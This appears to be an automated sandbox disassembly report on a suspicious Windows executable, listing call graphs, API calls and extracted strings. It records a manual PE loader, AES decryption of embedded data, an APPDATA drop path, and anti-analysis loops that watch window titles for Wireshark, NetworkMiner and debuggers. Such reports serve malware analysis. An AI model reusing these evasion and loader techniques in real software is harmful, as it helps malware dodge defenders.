36528 405457 K32GetModuleFileNameExA FindCloseChangeNotification 36526->36528 36529 4026b0 27 API calls 36527->36529 36528->36527 36530 4054ab 36529->36530 36531 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 36530->36531 36532 4054b9 GetCurrentProcessId 36531->36532 36533 405250 36532->36533 36534 410b00 __fread_nolock 36533->36534 36535 4052a5 OpenProcess 36534->36535 36536 4052f0 FindCloseChangeNotification 36535->36536 36537 4052bc K32EnumProcessModules 36535->36537 36539 405317 36536->36539 36537->36536 36538 4052d7 K32GetModuleBaseNameA 36537->36538 36538->36536 36539->36539 36540 4026b0 27 API calls 36539->36540 36541 40532f 36540->36541 36542 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 36541->36542 36543 40533d 36542->36543 36544 40c710 36543->36544 36545 40d660 27 API calls 36544->36545 36546 405528 36545->36546 36547 40c880 36546->36547 36548 40c896 36547->36548 36548->36548 36549 40c8ab _Yarn 36548->36549 36551 402980 27 API calls 4 library calls 36548->36551 36549->34342 36551->36549 36553 417b59 36552->36553 36554 417b6b 36552->36554 36580 40f746 GetModuleHandleW 36553->36580 36564 4179f2 36554->36564 36557 417b5e 36557->36554 36581 417bf1 GetModuleHandleExW 36557->36581 36558 40f4a8 36558->34142 36565 4179fe CallCatchBlock 36564->36565 36587 418bb1 EnterCriticalSection 36565->36587 36567 417a08 36588 417a5e 36567->36588 36569 417a15 36592 417a33 36569->36592 36572 417baf 36620 42041f GetPEB 36572->36620 36575 417bde 36578 417bf1 __InternalCxxFrameHandler 3 API calls 36575->36578 36576 417bbe GetPEB 36576->36575 36577 417bce GetCurrentProcess TerminateProcess 36576->36577 36577->36575 36579 417be6 ExitProcess 36578->36579 36580->36557 36582 417c10 GetProcAddress 36581->36582 36583 417c33 36581->36583 36586 417c25 36582->36586 36584 417b6a 36583->36584 36585 417c39 FreeLibrary 36583->36585 36584->36554 36585->36584 36586->36583 36587->36567 36589 417a6a CallCatchBlock 36588->36589 36591 417acb __InternalCxxFrameHandler 36589->36591 36595 41ab61 36589->36595 36591->36569 36619 418bf9 LeaveCriticalSection 36592->36619 36594 417a21 36594->36558 36594->36572 36598 41a892 36595->36598 36599 41a89e CallCatchBlock 36598->36599 36606 418bb1 EnterCriticalSection 36599->36606 36601 41a8ac 36607 41aa71 36601->36607 36605 41a8ca 36605->36591 36606->36601 36609 41aa90 36607->36609 36610 41a8b9 36607->36610 36608 41ab1e 36608->36610 36618 41e2b8 14 API calls _free 36608->36618 36609->36608 36609->36610 36614 40e925 36609->36614 36613 41a8e1 LeaveCriticalSection std::_Lockit::~_Lockit 36610->36613 36613->36605 36615 40e965 36614->36615 36616 40e94a RtlDecodePointer 36615->36616 36617 40e97a 36615->36617 36616->36615 36617->36609 36618->36610 36619->36594 36621 420439 36620->36621 36622 417bb9 36620->36622 36624 41e612 5 API calls std::_Locinfo::_Locinfo_dtor 36621->36624 36622->36575 36622->36576 36624->36622 36625 41e0b9 36630 41de8f 36625->36630 36628 41e0f8 36631 41deae 36630->36631 36632 41dec1 36631->36632 36641 41ded6 36631->36641 36650 4135f1 14 API calls _free 36632->36650 36634 41dec6 36651 413517 25 API calls ___std_exception_copy 36634->36651 36636 41dff6 36637 41ded1 36636->36637 36655 4135f1 14 API calls _free 36636->36655 36637->36628 36647 42869e 36637->36647 36639 41e0a7 36656 413517 25 API calls ___std_exception_copy 36639->36656 36641->36636 36652 427f2d 38 API calls 3 library calls 36641->36652 36643 41e046 36643->36636 36653 427f2d 38 API calls 3 library calls 36643->36653 36645 41e064 36645->36636 36654 427f2d 38 API calls 3 library calls 36645->36654 36657 428063 36647->36657 36650->36634 36651->36637 36652->36643 36653->36645 36654->36636 36655->36639 36656->36637 36659 42806f CallCatchBlock 36657->36659 36658 428076 36677 4135f1 14 API calls _free 36658->36677 36659->36658 36661 4280a1 36659->36661 36668 428630 36661->36668 36662 42807b 36678 413517 25 API calls ___std_exception_copy 36662->36678 36667 428085 36667->36628 36680 423b18 36668->36680 36673 428666 36675 4280c5 36673->36675 36735 41e2b8 14 API calls _free 36673->36735 36679 4280f8 LeaveCriticalSection __wsopen_s 36675->36679 36677->36662 36678->36667 36679->36667 36681 413621 __cftoe 38 API calls 36680->36681 36683 423b2a 36681->36683 36682 423b3c 36685 419d5b 36682->36685 36683->36682 36736 41e652 5 API calls std::_Locinfo::_Locinfo_dtor 36683->36736 36737 419ca9 36685->36737 36688 4286be 36762 42840c 36688->36762 36691 4286f0 36794 4135de 14 API calls _free 36691->36794 36692 428709 36780 42540e 36692->36780 36696 428717 36796 4135de 14 API calls _free 36696->36796 36697 42872e 36793 428377 CreateFileW 36697->36793 36701 428702 36701->36673 36702 42871c 36797 4135f1 14 API calls _free 36702->36797 36703 4287e4 GetFileType 36706 428836 36703->36706 36707 4287ef GetLastError 36703->36707 36705 4287b9 GetLastError 36799 4135bb 14 API calls 2 library calls 36705->36799 36802 425359 15 API calls 3 library calls 36706->36802 36800 4135bb 14 API calls 2 library calls 36707->36800 36708 4286f5 36795 4135f1 14 API calls _free 36708->36795 36709 428767 36709->36703 36709->36705 36798 428377 CreateFileW 36709->36798 36713 4287fd CloseHandle 36713->36708 36716 428826 36713->36716 36715 4287ac 36715->36703 36715->36705 36801 4135f1 14 API calls _free 36716->36801 36717 428857 36720 4288a3 36717->36720 36803 428586 72 API calls 4 library calls 36717->36803 36719 42882b 36719->36708 36724 4288aa 36720->36724 36804 428124 72 API calls 4 library calls 36720->36804 36723 4288d8 36723->36724 36725 4288e6 36723->36725 36726 41ec93 __wsopen_s 28 API calls 36724->36726 36725->36701 36727 428962 CloseHandle 36725->36727 36726->36701 36805 428377 CreateFileW 36727->36805 36729 42898d 36730 428997 GetLastError 36729->36730 36731 4289c3 36729->36731 36806 4135bb 14 API calls 2 library calls 36730->36806 36731->36701 36733 4289a3 36807 425521 15 API calls 3 library calls 36733->36807 36735->36675 36736->36682 36738 419cd1 36737->36738 36739 419cb7 36737->36739 36741 419cf7 36738->36741 36742 419cd8 36738->36742 36755 419d78 14 API calls _free 36739->36755 36757 41fe48 MultiByteToWideChar 36741->36757 36746 419cc1 36742->36746 36756 419db9 15 API calls __wsopen_s 36742->36756 36745 419d06 36747 419d0d GetLastError 36745->36747 36748 419d33 36745->36748 36760 419db9 15 API calls __wsopen_s 36745->36760 36746->36673 36746->36688 36758 4135bb 14 API calls 2 library calls 36747->36758 36748->36746 36761 41fe48 MultiByteToWideChar 36748->36761 36750 419d19 36759 4135f1 14 API calls _free 36750->36759 36754 419d4a 36754->36746 36754->36747 36755->36746 36756->36746 36757->36745 36758->36750 36759->36746 36760->36748 36761->36754 36763 428447 36762->36763 36764 42842d 36762->36764 36808 42839c 36763->36808 36764->36763 36815 4135f1 14 API calls _free 36764->36815 36766 42847f 36778 4284ae 36766->36778 36817 4135f1 14 API calls _free 36766->36817 36768 42843c 36816 413517 25 API calls ___std_exception_copy 36768->36816 36772 4284fc 36774 428579 36772->36774 36776 428501 36772->36776 36773 4284a3 36818 413517 25 API calls ___std_exception_copy 36773->36818 36820 413544 11 API calls __InternalCxxFrameHandler 36774->36820 36776->36691 36776->36692 36778->36776 36819 41ae70 25 API calls 2 library calls 36778->36819 36779 428585 36781 42541a CallCatchBlock 36780->36781 36823 418bb1 EnterCriticalSection 36781->36823 36784 425446 36827 4251e8 15 API calls 2 library calls 36784->36827 36785 425421 36785->36784 36789 4254b5 EnterCriticalSection 36785->36789 36792 425468 36785->36792 36788 42544b 36788->36792 36828 425336 EnterCriticalSection 36788->36828 36791 4254c2 LeaveCriticalSection 36789->36791 36789->36792 36791->36785 36824 425518 36792->36824 36793->36709 36794->36708 36795->36701 36796->36702 36797->36708 36798->36715 36799->36708 36800->36713 36801->36719 36802->36717 36803->36720 36804->36723 36805->36729 36806->36733 36807->36731 36811 4283b4 36808->36811 36809 4283cf 36809->36766 36811->36809 36821 4135f1 14 API calls _free 36811->36821 36812 4283f3 36822 413517 25 API calls ___std_exception_copy 36812->36822 36814 4283fe 36814->36766 36815->36768 36816->36763 36817->36773 36818->36778 36819->36772 36820->36779 36821->36812 36822->36814 36823->36785 36829 418bf9 LeaveCriticalSection 36824->36829 36826 425488 36826->36696 36826->36697 36827->36788 36828->36792 36829->36826 36830 40ee39 36841 40ee60 InitializeCriticalSectionAndSpinCount GetModuleHandleW 36830->36841 36832 40ee3e 36852 40f0ce IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_release_startup_lock 36832->36852 36834 40ee45 36835 40ee58 36834->36835 36836 40ee4a 36834->36836 36854 40f5f5 4 API calls 2 library calls 36835->36854 36853 40f25b 28 API calls 36836->36853 36839 40ee54 36840 40ee5f 36842 40ee83 GetModuleHandleW 36841->36842 36843 40ee94 GetProcAddress GetProcAddress 36841->36843 36842->36843 36844 40eeda 36842->36844 36845 40eeb2 36843->36845 36846 40eec4 CreateEventW 36843->36846 36855 40f5f5 4 API calls 2 library calls 36844->36855 36845->36846 36847 40eeb6 36845->36847 36846->36844 36846->36847 36847->36832 36849 40eee1 DeleteCriticalSection 36850 40eef6 CloseHandle 36849->36850 36851 40eefd 36849->36851 36850->36851 36851->36832 36852->36834 36853->36839 36854->36840 36855->36849

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 163 402f20-402f42 164 402f44-402f6b SetLastError call 402bc0 call 40ebbf 163->164 165 402f6c-402f74 163->165 167 402fa1-402faf 165->167 168 402f76 165->168 171 402fb1-402fd8 SetLastError call 402bc0 call 40ebbf 167->171 172 402fd9-402fe6 167->172 170 402f7b-402fa0 call 402bc0 SetLastError call 40ebbf 168->170 174 402fe8-402fed 172->174 175 402fef-402ff8 172->175 174->170 179 403004-40300a 175->179 180 402ffa-402fff 175->180 183 403016-403023 179->183 184 40300c-403011 179->184 180->170 188 403044-403067 GetNativeSystemInfo 183->188 189 403025 183->189 184->170 192 403073-40308b VirtualAlloc 188->192 193 403069-40306e 188->193 191 403027-403042 189->191 191->188 191->191 194 4030b3-4030ce GetProcessHeap HeapAlloc 192->194 195 40308d-40309d VirtualAlloc 192->195 193->170 196 4030d0-4030dd VirtualFree 194->196 197 4030e4-40312a 194->197 195->194 198 40309f-4030ac call 402bc0 195->198 196->197 199 40312c-40312e SetLastError 197->199 200 40314e-403196 VirtualAlloc call 4104c0 197->200 198->194 203 403134-40314d call 403680 call 40ebbf 199->203 208 40319c-40319f 200->208 209 40324f-403258 200->209 210 4031a0-4031a5 208->210 211 4032dd 209->211 212 40325e-403265 209->212 214 4031a7-4031b3 210->214 215 4031e8-4031f0 210->215 219 4032e2-4032ee call 402d20 211->219 216 403267-403269 212->216 217 40326b-40327d 212->217 221 403234-403246 214->221 222 4031b5-4031cf 214->222 215->199 224 4031f6-403209 call 402e90 215->224 216->219 217->211 223 40327f 217->223 219->203 228 4032f4-403317 219->228 221->210 226 40324c 221->226 222->203 235 4031d5-4031e6 call 410b00 222->235 227 403280-403295 223->227 232 40320b-403210 224->232 226->209 230 403297-40329a 227->230 231 4032ce-4032d8 227->231 233 403319-40331e 228->233 234 40332c-40334c 228->234 236 4032a0-4032b1 230->236 231->227 238 4032da 231->238 232->203 237 403216-40322b call 4104c0 232->237 239 403320-403323 233->239 240 403325-403327 233->240 242 403352-403358 234->242 243 403415-403421 call 402bf0 234->243 252 40322e-403231 235->252 244 4032b3-4032bb 236->244 245 4032be-4032cc 236->245 237->252 238->211 239->234 240->234 247 403329 240->247 249 403360-403379 242->249 255 403426-403428 243->255 244->245 245->231 245->236 247->234 253 403393-403396 249->253 254 40337b-40337e 249->254 252->221 256 4033d3-4033df 253->256 257 403398-40339f 253->257 258 403380-403383 254->258 259 403385-403388 254->259 255->203 260 40342e-40343a 255->260 263 4033e1 256->263 264 4033e7-4033f0 256->264 261 4033d0 257->261 262 4033a1-4033a6 call 402bf0 257->262 265 40338d-403390 258->265 259->253 266 40338a 259->266 267 403463-403468 260->267 268 40343c-403445 260->268 261->256 275 4033ab-4033ad 262->275 263->264 272 4033f3-40340f 264->272 265->253 266->265 270 4034ba-4034d3 call 40ebbf 267->270 271 40346a-403473 267->271 268->267 273 403447-40344b 268->273 277 4034a4-4034b9 call 40ebbf 271->277 278 403475-40347e 271->278 272->243 272->249 273->267 274 40344d 273->274 280 403450-40345f 274->280 275->203 281 4033b3-4033ce 275->281 286 403480 278->286 287 40348a-4034a3 call 40ebbf 278->287 288 403461 280->288 281->272 286->287 288->267
                                          APIs
                                          • SetLastError.KERNEL32(0000000D,?), ref: 00402F46
                                          • SetLastError.KERNEL32(000000C1), ref: 00402F88
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast
                                          • String ID: @$DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!$v+@
                                          • API String ID: 1452528299-3666885587
                                          • Opcode ID: ce0b6ba3c7f08ce00cb437c0cd81f476a8ad27299f5e07271d5d503724786e68
                                          • Instruction ID: ee8b362cb5bcb5acb02f75210dba8d77fdcb81ba509aa6813b7c3456fb0d570c
                                          • Opcode Fuzzy Hash: ce0b6ba3c7f08ce00cb437c0cd81f476a8ad27299f5e07271d5d503724786e68
                                          • Instruction Fuzzy Hash: 92128C71A012159BCB14CFA9D981BADBBB5FF48305F14416AE809AB3C1D7B8ED41CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 292 4056a0-405720 293 405722-405736 call 40ef48 292->293 294 405767-40576e 292->294 293->294 301 405738-405764 call 40f25b call 40eefe 293->301 295 405770-405795 294->295 296 40579a-4057c4 294->296 295->296 298 4057c7-4057cc 296->298 298->298 300 4057ce-40582c call 4026b0 GetUserNameA 298->300 307 405830-405835 300->307 301->294 307->307 309 405837-405868 call 4026b0 call 40ca60 307->309 314 405899-4058a6 309->314 315 40586a-405879 309->315 318 4058d7-4058d9 314->318 319 4058a8-4058b7 314->319 316 40587b-405889 315->316 317 40588f-405896 call 40edff 315->317 316->317 320 405e94-405e99 call 413527 316->320 317->314 324 405e74-405e91 call 40ebbf 318->324 325 4058df-4058f6 318->325 322 4058b9-4058c7 319->322 323 4058cd-4058d4 call 40edff 319->323 322->320 322->323 323->318 330 405936-40593d 325->330 331 4058f8-40590c call 40ef48 325->331 334 40595e-40598b 330->334 335 40593f-405959 330->335 331->330 340 40590e-405933 call 40f25b call 40eefe 331->340 339 405990-405995 334->339 335->334 339->339 341 405997-4059ef call 4026b0 GetUserNameA 339->341 340->330 347 4059f0-4059f5 341->347 347->347 349 4059f7-405a28 call 4026b0 call 40ca60 347->349 354 405a59-405a66 349->354 355 405a2a-405a39 349->355 358 405a97-405a99 354->358 359 405a68-405a77 354->359 356 405a3b-405a49 355->356 357 405a4f-405a56 call 40edff 355->357 356->320 356->357 357->354 358->324 363 405a9f-405ac7 358->363 361 405a79-405a87 359->361 362 405a8d-405a94 call 40edff 359->362 361->320 361->362 362->358 364 405b13-405b1a 363->364 365 405ac9-405add call 40ef48 363->365 369 405b62-405b8f 364->369 370 405b1c-405b5d 364->370 365->364 374 405adf-405b10 call 40f25b call 40eefe 365->374 373 405b90-405b95 369->373 370->369 373->373 375 405b97-405bef call 4026b0 GetUserNameA 373->375 374->364 381 405bf0-405bf5 375->381 381->381 382 405bf7-405c28 call 4026b0 call 40ca60 381->382 388 405c59-405c66 382->388 389 405c2a-405c39 382->389 392 405c97-405c99 388->392 393 405c68-405c77 388->393 390 405c3b-405c49 389->390 391 405c4f-405c56 call 40edff 389->391 390->320 390->391 391->388 392->324 394 405c9f-405cbe GetForegroundWindow GetWindowTextA 392->394 396 405c79-405c87 393->396 397 405c8d-405c94 call 40edff 393->397 398 405cc1-405cc6 394->398 396->320 396->397 397->392 398->398 401 405cc8-405cf3 call 4026b0 call 4101e0 398->401 407 405cf9-405cff 401->407 408 405e3e-405e47 401->408 409 405d00-405d16 call 4101e0 407->409 408->324 410 405e49-405e58 408->410 409->408 416 405d1c-405d32 call 4101e0 409->416 412 405e6a-405e71 call 40edff 410->412 413 405e5a-405e68 410->413 412->324 413->320 413->412 416->408 420 405d38-405d4e call 4101e0 416->420 420->408 423 405d54-405d6a call 4101e0 420->423 423->408 426 405d70-405d79 423->426 427 405d80-405d85 426->427 427->427 428 405d87-405d8d 427->428 429 405dad-405dc3 call 4101e0 428->429 430 405d8f 428->430 429->408 436 405dc5-405ddb call 4101e0 429->436 431 405d90-405dab call 418275 430->431 431->429 436->408 439 405ddd-405e03 Sleep GetForegroundWindow GetWindowTextA 436->439 440 405e06-405e0b 439->440 440->440 441 405e0d-405e38 call 4026b0 call 4101e0 440->441 441->408 441->409
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 0040575F
                                            • Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
                                            • Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
                                            • Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2
                                          • __Init_thread_footer.LIBCMT ref: 0040592E
                                          • GetUserNameA.ADVAPI32(?,}FOF@.), ref: 004059C6
                                          • GetUserNameA.ADVAPI32(?,OJCG@.), ref: 00405803
                                            • Part of subcall function 0040EF48: EnterCriticalSection.KERNEL32(004504FC,00450D8D,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF53
                                            • Part of subcall function 0040EF48: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF90
                                          • __Init_thread_footer.LIBCMT ref: 00405B0B
                                          • GetUserNameA.ADVAPI32(?,lK@MF.), ref: 00405BC6
                                          • GetForegroundWindow.USER32(?,?), ref: 00405C9F
                                          • GetWindowTextA.USER32 ref: 00405CB2
                                          • Sleep.KERNEL32(00000258), ref: 00405DE2
                                          • GetForegroundWindow.USER32 ref: 00405DE4
                                          • GetWindowTextA.USER32 ref: 00405DF7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSectionWindow$Init_thread_footerNameUser$EnterForegroundLeaveText$ConditionSleepVariableWake
                                          • String ID: Far $HTTP Analyzer$NetworkMiner$OJCG@.$Wireshark$ZK]Z$dbg$debug$roxifier
                                          • API String ID: 3399126515-619935782
                                          • Opcode ID: 31dd46c91be120cfb9063c524cf2d76983dc327de586dcfc4b038ca48fcf9a12
                                          • Instruction ID: 074b258c6d59ddac17b90d1b3a787091faffede02681fa5b6702e06cb24e023a
                                          • Opcode Fuzzy Hash: 31dd46c91be120cfb9063c524cf2d76983dc327de586dcfc4b038ca48fcf9a12
                                          • Instruction Fuzzy Hash: 2F1225719002988ADB29DF24DC49BDE7B74EB46308F1041FAD448672D2DB7D9B89CF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateDirectoryA.KERNEL32(0040813E,00000000,DCBD048B,?), ref: 0040684F
                                          • GetLastError.KERNEL32 ref: 00406859
                                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,DCBD048B,?,00000000), ref: 00406B37
                                          • __Init_thread_footer.LIBCMT ref: 00406F6C
                                          • Sleep.KERNEL32(?,DCBD048B), ref: 00408D5F
                                            • Part of subcall function 00402980: Concurrency::cancel_current_task.LIBCPMT ref: 00402AD3
                                          • __Init_thread_footer.LIBCMT ref: 0040746E
                                          • __Init_thread_footer.LIBCMT ref: 00407928
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Init_thread_footer$Concurrency::cancel_current_taskCreateDirectoryErrorFolderLastPathSleep
                                          • String ID: .exe$APPDATA$KC^.$OCjO$\AI\$)<
                                          • API String ID: 1816155683-548552080
                                          • Opcode ID: 139fb17deca05b2c8f1ec0f17ad5d96a8aaffc1ce760a88e4899f3a611e21d42
                                          • Instruction ID: 0be4c55f84660d75167a20acadb567ab38b5d4c0f6123eba4fa82a51dea9132a
                                          • Opcode Fuzzy Hash: 139fb17deca05b2c8f1ec0f17ad5d96a8aaffc1ce760a88e4899f3a611e21d42
                                          • Instruction Fuzzy Hash: 02E21570A002549BEB19DB28CD447DDBB71AF46308F1082EED449BB3D2DB799AC4CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1370 403770-4037f8 CryptAcquireContextW 1371 4038ba-4038d0 GetLastError CryptReleaseContext 1370->1371 1372 4037fe-40381c CryptCreateHash 1370->1372 1374 403a04-403a0a 1371->1374 1372->1371 1373 403822-403835 1372->1373 1375 403838-40383d 1373->1375 1376 403a34-403a51 call 40ebbf 1374->1376 1377 403a0c-403a18 1374->1377 1375->1375 1378 40383f-403886 call 40ee0d call 41657c CryptHashData 1375->1378 1380 403a2a-403a31 call 40edff 1377->1380 1381 403a1a-403a28 1377->1381 1393 403896-4038b8 CryptDeriveKey 1378->1393 1394 403888-403891 GetLastError 1378->1394 1380->1376 1381->1380 1382 403a52-403a90 call 413527 call 40ff71 1381->1382 1393->1371 1396 4038d5-4038d6 call 4162ee 1393->1396 1394->1374 1398 4038db-403927 call 4104c0 call 40ee0d 1396->1398 1403 4039f8-4039fe CryptDestroyKey 1398->1403 1404 40392d-40393c 1398->1404 1403->1374 1405 403942-40394b 1404->1405 1406 403959-403994 call 4104c0 CryptDecrypt 1405->1406 1407 40394d-40394f 1405->1407 1406->1403 1410 403996-4039c1 call 4104c0 1406->1410 1407->1406 1410->1403 1413 4039c3-4039f2 1410->1413 1413->1403 1413->1405
                                          APIs
                                          • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,DCBD048B), ref: 004037F0
                                          • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403814
                                          • _mbstowcs.LIBCMT ref: 00403867
                                          • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 0040387E
                                          • GetLastError.KERNEL32 ref: 00403888
                                          • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 004038B0
                                          • GetLastError.KERNEL32 ref: 004038BA
                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004038CA
                                          • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 0040398C
                                          • CryptDestroyKey.ADVAPI32(?), ref: 004039FE
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 00403A7E
                                          Strings
                                          • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 004037CC, 00403A63
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease___std_exception_copy_mbstowcs
                                          • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                          • API String ID: 4265767208-63410773
                                          • Opcode ID: cf61a024e7b059b9c70e00f8277d4a847d871fa60616db5b4861065f2fd07a60
                                          • Instruction ID: d958dc93e540a12c37dba8d87c44a8e8f394457365b2a07e5a0a794f231eaf70
                                          • Opcode Fuzzy Hash: cf61a024e7b059b9c70e00f8277d4a847d871fa60616db5b4861065f2fd07a60
                                          • Instruction Fuzzy Hash: 2881A071B00228AFEB209F25CC41B9ABBB9FF45304F4081AAF54DE7281DB759E858F55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 004065E0: GetCurrentProcess.KERNEL32(00000008,?), ref: 00406603
                                            • Part of subcall function 004065E0: OpenProcessToken.ADVAPI32(00000000), ref: 0040660A
                                            • Part of subcall function 004065E0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,0000004C,?), ref: 00406623
                                            • Part of subcall function 004065E0: CloseHandle.KERNEL32(?), ref: 00406630
                                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,DCBD048B,?,00000000), ref: 00406B37
                                          • __Init_thread_footer.LIBCMT ref: 00407ED3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessToken$CloseCurrentFolderHandleInformationInit_thread_footerOpenPath
                                          • String ID: .exe$KC^.$OCjO$\AI\$)<
                                          • API String ID: 3622068345-3793718068
                                          • Opcode ID: 86dc44fb994b6dd9415c0bf608af7ba4a3155d101221ce84dd0fc1e0b537eb51
                                          • Instruction ID: f3a4c0b65de27d6511d17ec44510e10968ea22a81531b86e1dbf32cc3aae07d1
                                          • Opcode Fuzzy Hash: 86dc44fb994b6dd9415c0bf608af7ba4a3155d101221ce84dd0fc1e0b537eb51
                                          • Instruction Fuzzy Hash: 87C21570A002588BEB25DB24CE447DDBB71AF56308F1042EED4497B2D2DB799B88CF59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2203 404490-40451a call 40bb90 2206 40453c-404555 call 402980 2203->2206 2207 40451c-40453a 2203->2207 2208 40455a-404578 FindFirstFileA 2206->2208 2207->2208 2210 40465b-404669 2208->2210 2211 40457e-404588 2208->2211 2213 4046e8 2210->2213 2214 40466b 2210->2214 2212 404590-4045ae 2211->2212 2216 4045b2-4045b7 2212->2216 2215 4046ea-4046f0 2213->2215 2217 404670-4046a7 call 40bb90 call 402890 2214->2217 2218 4046f2-4046fe 2215->2218 2219 40471e-404735 2215->2219 2216->2216 2220 4045b9-4045d5 call 4026b0 2216->2220 2244 4047c7-4047ca 2217->2244 2245 4046ad-4046b0 2217->2245 2222 404700-40470e 2218->2222 2223 404714-40471b call 40edff 2218->2223 2226 404737-40476a call 40d3f0 2219->2226 2227 40479f-4047a5 2219->2227 2241 4045d7-4045fb 2220->2241 2242 4045fd-40460a call 40ce50 2220->2242 2222->2223 2231 404827 call 413527 2222->2231 2223->2219 2246 404780-404798 call 40edff 2226->2246 2247 40476c-40477a 2226->2247 2229 404807-404826 call 40ebbf 2227->2229 2230 4047a7-4047b3 2227->2230 2237 4047b5-4047c3 2230->2237 2238 4047fd-404804 call 40edff 2230->2238 2251 40482c-4048a6 call 413527 2231->2251 2237->2231 2250 4047c5 2237->2250 2238->2229 2252 40460d-404614 2241->2252 2242->2252 2262 4047f3-4047f8 2244->2262 2263 4047cc-4047d7 2244->2263 2255 4046b2-4046bd 2245->2255 2256 4046dd-4046e6 2245->2256 2246->2227 2247->2231 2247->2246 2250->2238 2279 4048a8-4048bc call 40ef48 2251->2279 2280 4048ed-4048f4 2251->2280 2257 404642-40464e FindNextFileA 2252->2257 2258 404616-404622 2252->2258 2264 4046d3-4046da call 40edff 2255->2264 2265 4046bf-4046cd 2255->2265 2256->2213 2256->2217 2257->2212 2269 404654-404655 FindClose 2257->2269 2266 404624-404632 2258->2266 2267 404638-40463f call 40edff 2258->2267 2262->2215 2271 4047e9-4047f0 call 40edff 2263->2271 2272 4047d9-4047e7 2263->2272 2264->2256 2265->2251 2265->2264 2266->2231 2266->2267 2267->2257 2269->2210 2271->2262 2272->2251 2272->2271 2279->2280 2288 4048be-4048ea call 40f25b call 40eefe 2279->2288 2282 4048f6-4048f8 2280->2282 2283 40490d-40492e 2280->2283 2285 404900-40490b 2282->2285 2286 404930-404935 2283->2286 2285->2283 2285->2285 2286->2286 2289 404937-40497f call 4026b0 call 418b65 2286->2289 2288->2280 2298 404982-404987 2289->2298 2298->2298 2299 404989-40499f call 4026b0 2298->2299 2302 4049a1-4049ad 2299->2302 2303 4049cd-4049f3 2299->2303 2304 4049c3-4049ca call 40edff 2302->2304 2305 4049af-4049bd 2302->2305 2306 4049f5-404a14 call 4104c0 2303->2306 2307 404a16-404a20 2303->2307 2304->2303 2305->2304 